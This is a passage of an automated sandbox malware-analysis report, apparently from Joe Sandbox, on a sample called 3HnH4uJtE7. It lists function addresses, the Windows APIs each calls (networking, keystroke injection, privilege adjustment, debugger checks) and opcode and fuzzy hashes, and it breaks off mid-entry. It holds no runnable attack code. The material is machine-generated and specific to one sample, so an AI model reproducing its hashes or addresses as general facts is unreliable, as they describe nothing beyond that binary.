                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Color$LongProcWindow
                                                                    • String ID:
                                                                    • API String ID: 3131106179-0
                                                                    • Opcode ID: 1837497e9833eb13176c7cb0b39cc8845b818aade690722177c35146160a3657
                                                                    • Instruction ID: 185dcce16e73c945b18d357ce0ed348f1656c8f42806b889ff3ae6678cf2ad94
                                                                    • Opcode Fuzzy Hash: 1837497e9833eb13176c7cb0b39cc8845b818aade690722177c35146160a3657
                                                                    • Instruction Fuzzy Hash: CDA17EB120846CBEE738AA7C8C99F7B769DFB82314F10420AF692C65D1CA259D01D772
                                                                    Function 00961806 Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 0096304E: inet_addr.WSOCK32(?), ref: 0096307A
                                                                      • Part of subcall function 0096304E: _wcslen.LIBCMT ref: 0096309B
                                                                    • socket.WSOCK32(00000002,00000002,00000011), ref: 0096185D
                                                                    • WSAGetLastError.WSOCK32 ref: 00961884
                                                                    • bind.WSOCK32(00000000,?,00000010), ref: 009618DB
                                                                    • WSAGetLastError.WSOCK32 ref: 009618E6
                                                                    • closesocket.WSOCK32(00000000), ref: 00961915
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                                                    • String ID:
                                                                    • API String ID: 1601658205-0
                                                                    • Opcode ID: 72b04b706c7ca0c6b219e1eea6e68da5ffd7fbffa3897ed10189a9c9a7002be9
                                                                    • Instruction ID: d576f579b0559731347e49a84c047e6a268ca066fcebb58b433076656211d455
                                                                    • Opcode Fuzzy Hash: 72b04b706c7ca0c6b219e1eea6e68da5ffd7fbffa3897ed10189a9c9a7002be9
                                                                    • Instruction Fuzzy Hash: 7351B471A002109FD710AF28D886F6A77E5EB45718F08845CF9159F3D3D771AD418BA2
                                                                    Function 00971C41 Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                    • String ID:
                                                                    • API String ID: 292994002-0
                                                                    • Opcode ID: dc487ed65a02af4d19c44c45d39cb88320035e2a5cb0d754a89e4f80c0e2346b
                                                                    • Instruction ID: 1099ca8f3b023b9deb96a187eb01e3907d5c33e0b4197ea5089b15127acedff7
                                                                    • Opcode Fuzzy Hash: dc487ed65a02af4d19c44c45d39cb88320035e2a5cb0d754a89e4f80c0e2346b
                                                                    • Instruction Fuzzy Hash: 3121A0327402015FD7218F5EC884B2A7BA9EF85314B1DC05CE88E8B251CB71EC42CB90
                                                                    Function 008E8060 Relevance: 7.4, Strings: 5, Instructions: 1151COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                                                    • API String ID: 0-1546025612
                                                                    • Opcode ID: 4fe8632cda7ca7b33052ae5291b0335c1ee2cc97c20b5101ae82854e53823f13
                                                                    • Instruction ID: d19d6072b94765976761d67efeb42b7dd0171dfa60d026fcc80dc0e985ab7338
                                                                    • Opcode Fuzzy Hash: 4fe8632cda7ca7b33052ae5291b0335c1ee2cc97c20b5101ae82854e53823f13
                                                                    • Instruction Fuzzy Hash: 92A28E70A0066ACBDF24CF59D8407ADB7B1FF55314F2585AAE819E7688EB309D81CF90
                                                                    Function 0096A67C Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 0096A6AC
                                                                    • Process32FirstW.KERNEL32(00000000,?), ref: 0096A6BA
                                                                      • Part of subcall function 008E9CB3: _wcslen.LIBCMT ref: 008E9CBD
                                                                    • Process32NextW.KERNEL32(00000000,?), ref: 0096A79C
                                                                    • CloseHandle.KERNEL32(00000000), ref: 0096A7AB
                                                                      • Part of subcall function 008FCE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00923303,?), ref: 008FCE8A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                                                    • String ID:
                                                                    • API String ID: 1991900642-0
                                                                    • Opcode ID: e49e90a7b58cece87eb2bb23f325d1e3491d1f70aca057444fd068feb6aec0de
                                                                    • Instruction ID: 7562f496b1162d0873a415d915f774c36f8a2cfa4a8a05c91eb3de89ba27c70a
                                                                    • Opcode Fuzzy Hash: e49e90a7b58cece87eb2bb23f325d1e3491d1f70aca057444fd068feb6aec0de
                                                                    • Instruction Fuzzy Hash: 06514C715083409FD710EF29C886A6BBBE8FF89754F40492DF595D7262EB70E904CB92
                                                                    Function 0094AA57 Relevance: 6.1, APIs: 4, Instructions: 107keyboardwindowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 0094AAAC
                                                                    • SetKeyboardState.USER32(00000080), ref: 0094AAC8
                                                                    • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 0094AB36
                                                                    • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 0094AB88
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: KeyboardState$InputMessagePostSend
                                                                    • String ID:
                                                                    • API String ID: 432972143-0
                                                                    • Opcode ID: f405b3a8fc165d5fd51ca91f7d56d42b70546d4c44b7ef99cf1b400efec3ef1d
                                                                    • Instruction ID: 66d935ca39955cef175ce32ef6234f70da8a01855a0be217a1438870dafeb9cf
                                                                    • Opcode Fuzzy Hash: f405b3a8fc165d5fd51ca91f7d56d42b70546d4c44b7ef99cf1b400efec3ef1d
                                                                    • Instruction Fuzzy Hash: 0F312470AC0208AEFF35CB65CC05FFA7BAAEB94320F04421BF585961D0D3798981D7A2
                                                                    Function 0091BB6F Relevance: 6.1, APIs: 4, Instructions: 90timeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _free.LIBCMT ref: 0091BB7F
                                                                      • Part of subcall function 009129C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0091D7D1,00000000,00000000,00000000,00000000,?,0091D7F8,00000000,00000007,00000000,?,0091DBF5,00000000), ref: 009129DE
                                                                      • Part of subcall function 009129C8: GetLastError.KERNEL32(00000000,?,0091D7D1,00000000,00000000,00000000,00000000,?,0091D7F8,00000000,00000007,00000000,?,0091DBF5,00000000,00000000), ref: 009129F0
                                                                    • GetTimeZoneInformation.KERNEL32 ref: 0091BB91
                                                                    • WideCharToMultiByte.KERNEL32(00000000,?,009B121C,000000FF,?,0000003F,?,?), ref: 0091BC09
                                                                    • WideCharToMultiByte.KERNEL32(00000000,?,009B1270,000000FF,?,0000003F,?,?,?,009B121C,000000FF,?,0000003F,?,?), ref: 0091BC36
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone_free
                                                                    • String ID:
                                                                    • API String ID: 806657224-0
                                                                    • Opcode ID: 042cb60ee7de8d446ba4f0a3fed00a07f7e56b8ad23212796f44524f084214db
                                                                    • Instruction ID: 6008b0b5ae8d4cf44f98fa534432929cf273591406ee546fcc782106a8db76e2
                                                                    • Opcode Fuzzy Hash: 042cb60ee7de8d446ba4f0a3fed00a07f7e56b8ad23212796f44524f084214db
                                                                    • Instruction Fuzzy Hash: 96310471A08209DFCB15DF68CD909ADBBB9FF4532075442AEE060DB2B1C7309D81DB90
                                                                    Function 0095CE44 Relevance: 6.1, APIs: 4, Instructions: 75filenetworkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • InternetReadFile.WININET(?,?,00000400,?), ref: 0095CE89
                                                                    • GetLastError.KERNEL32(?,00000000), ref: 0095CEEA
                                                                    • SetEvent.KERNEL32(?,?,00000000), ref: 0095CEFE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorEventFileInternetLastRead
                                                                    • String ID:
                                                                    • API String ID: 234945975-0
                                                                    • Opcode ID: cde1907b661a3708e55e0c50b4b7e12e2f9a6d7fab95e6bb16b446fdee4c0142
                                                                    • Instruction ID: c0c4754162854fc463e0b5bfa9fa1a6b6c5466caaf02e5ecc5f3420215e30570
                                                                    • Opcode Fuzzy Hash: cde1907b661a3708e55e0c50b4b7e12e2f9a6d7fab95e6bb16b446fdee4c0142
                                                                    • Instruction Fuzzy Hash: 6821BDB25043059FEB20CFA6C949BA677FCEB40319F10481EE946A2151E774EE489B90
                                                                    Function 00948298 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 568stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • lstrlenW.KERNEL32(?,?,?,00000000), ref: 009482AA
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: lstrlen
                                                                    • String ID: ($|
                                                                    • API String ID: 1659193697-1631851259
                                                                    • Opcode ID: 4b2e52abd7637e146ea6c35fa0aced898630a569d40dd3b2d891bccfdd79c71a
                                                                    • Instruction ID: a2e3816d629df1e6f842c6aad02c7b418559d503b2ea0eda23cff3e9fa64090d
                                                                    • Opcode Fuzzy Hash: 4b2e52abd7637e146ea6c35fa0aced898630a569d40dd3b2d891bccfdd79c71a
                                                                    • Instruction Fuzzy Hash: 6E322575A006059FCB28CF69C481E6AB7F0FF48710B15C56EE59ADB3A1EB70E981CB40
                                                                    Function 00955C97 Relevance: 4.6, APIs: 3, Instructions: 138fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00955CC1
                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 00955D17
                                                                    • FindClose.KERNEL32(?), ref: 00955D5F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Find$File$CloseFirstNext
                                                                    • String ID:
                                                                    • API String ID: 3541575487-0
                                                                    • Opcode ID: 9569933ebf2e747a4543728d0b3efeb940c1f6eaa12d8c384b9478a00fe337ed
                                                                    • Instruction ID: 86bba7d07dcde8b8b90e7d7c232b3f298d4ea98b6305ca73fa47acac4df32052
                                                                    • Opcode Fuzzy Hash: 9569933ebf2e747a4543728d0b3efeb940c1f6eaa12d8c384b9478a00fe337ed
                                                                    • Instruction Fuzzy Hash: F9519B756046019FC714CF29C494A9AB7F8FF4A314F15855DE9AA8B3A2CB30ED44CF91
                                                                    Function 00912622 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • IsDebuggerPresent.KERNEL32 ref: 0091271A
                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00912724
                                                                    • UnhandledExceptionFilter.KERNEL32(?), ref: 00912731
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                    • String ID:
                                                                    • API String ID: 3906539128-0
                                                                    • Opcode ID: dd5c31487a5bfb75f4abbbdd3390c13b084206c2ce89b6c4916ad9dbf48cda69
                                                                    • Instruction ID: a7dc8760a7b091a609ae777034975cdf38bcbf189a3dca0958cc46c67074b407
                                                                    • Opcode Fuzzy Hash: dd5c31487a5bfb75f4abbbdd3390c13b084206c2ce89b6c4916ad9dbf48cda69
                                                                    • Instruction Fuzzy Hash: 9031D67591121C9BCB21DF68DD897DDB7B8AF48310F5041EAE41CA72A1E7309F818F45
                                                                    Function 009551CD Relevance: 4.6, APIs: 3, Instructions: 76COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SetErrorMode.KERNEL32(00000001), ref: 009551DA
                                                                    • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00955238
                                                                    • SetErrorMode.KERNEL32(00000000), ref: 009552A1
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorMode$DiskFreeSpace
                                                                    • String ID:
                                                                    • API String ID: 1682464887-0
                                                                    • Opcode ID: 7889572ceb5f94e0757af5aff91b024b327d6f6958d0ae135e4da532d9ec1c42
                                                                    • Instruction ID: aadfac842077c3ba5f9de72d81832b51ceeba0ce026606d65a5ef21f65e65096
                                                                    • Opcode Fuzzy Hash: 7889572ceb5f94e0757af5aff91b024b327d6f6958d0ae135e4da532d9ec1c42
                                                                    • Instruction Fuzzy Hash: E031BF75A00508DFDB00DF55D884EADBBB4FF09314F0580A9E809AB362DB31EC4ACB91
                                                                    Function 009416C3 Relevance: 4.6, APIs: 3, Instructions: 68COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 008FFDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00900668
                                                                      • Part of subcall function 008FFDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00900685
                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0094170D
                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0094173A
                                                                    • GetLastError.KERNEL32 ref: 0094174A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                                                    • String ID:
                                                                    • API String ID: 577356006-0
                                                                    • Opcode ID: 5ddad0f8a485d8ddc83cc72583e8e02177f0b9b0f08154b87ba6e0322ea0363e
                                                                    • Instruction ID: 5c19acca6426fd6cf09292c5e5a6ff5af7636cda3ef0f72dbca69bbf2277a4d1
                                                                    • Opcode Fuzzy Hash: 5ddad0f8a485d8ddc83cc72583e8e02177f0b9b0f08154b87ba6e0322ea0363e
                                                                    • Instruction Fuzzy Hash: 4D11CEB2414309AFE718AF64DC86D6AB7BDFF04714B20852EE15693241EB70FC818B60
                                                                    Function 0094D5EB Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0094D608
                                                                    • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 0094D645
                                                                    • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0094D650
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: CloseControlCreateDeviceFileHandle
                                                                    • String ID:
                                                                    • API String ID: 33631002-0
                                                                    • Opcode ID: abd04d0c6bb03b80130b6e13ac1651b0a4cdfb2c0b8d7771b18cfb7db9e820e5
                                                                    • Instruction ID: 811e3f5748f1608a3eb34b712a33fcad2c2b6e6ae3286c3a9aedbbd160ceeb62
                                                                    • Opcode Fuzzy Hash: abd04d0c6bb03b80130b6e13ac1651b0a4cdfb2c0b8d7771b18cfb7db9e820e5
                                                                    • Instruction Fuzzy Hash: 7511A1B6E05228BFDB108F98DC44FAFBFBCEB45B50F108125F908E7290C2704A018BA1
                                                                    Function 00941663 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0094168C
                                                                    • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 009416A1
                                                                    • FreeSid.ADVAPI32(?), ref: 009416B1
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                    • String ID:
                                                                    • API String ID: 3429775523-0
                                                                    • Opcode ID: cfa6a3491f0db0fe9bbd8c9e13e6fbcb95dcebd056c5d2fd0133f2a414777a1d
                                                                    • Instruction ID: a17d3918a147d0916cc6b343115465aafb2d79652d5411e0b771a9c2a6b53012
                                                                    • Opcode Fuzzy Hash: cfa6a3491f0db0fe9bbd8c9e13e6fbcb95dcebd056c5d2fd0133f2a414777a1d
                                                                    • Instruction Fuzzy Hash: B8F0F4B2950309FBDF00DFE49C89EAEBBBCFB08604F504565E501E2181E774AA849BA0
                                                                    Function 00904CE8 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetCurrentProcess.KERNEL32(009128E9,?,00904CBE,009128E9,009A88B8,0000000C,00904E15,009128E9,00000002,00000000,?,009128E9), ref: 00904D09
                                                                    • TerminateProcess.KERNEL32(00000000,?,00904CBE,009128E9,009A88B8,0000000C,00904E15,009128E9,00000002,00000000,?,009128E9), ref: 00904D10
                                                                    • ExitProcess.KERNEL32 ref: 00904D22
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Process$CurrentExitTerminate
                                                                    • String ID:
                                                                    • API String ID: 1703294689-0
                                                                    • Opcode ID: 1e3a4b946854b8c4d32bdf3f1721564b4a9f6319003cf4110870d40b7ddc789c
                                                                    • Instruction ID: 0242f1fb78880037b9bf2c34a71b59d3646aa2489035ef3c32a521b98c184651
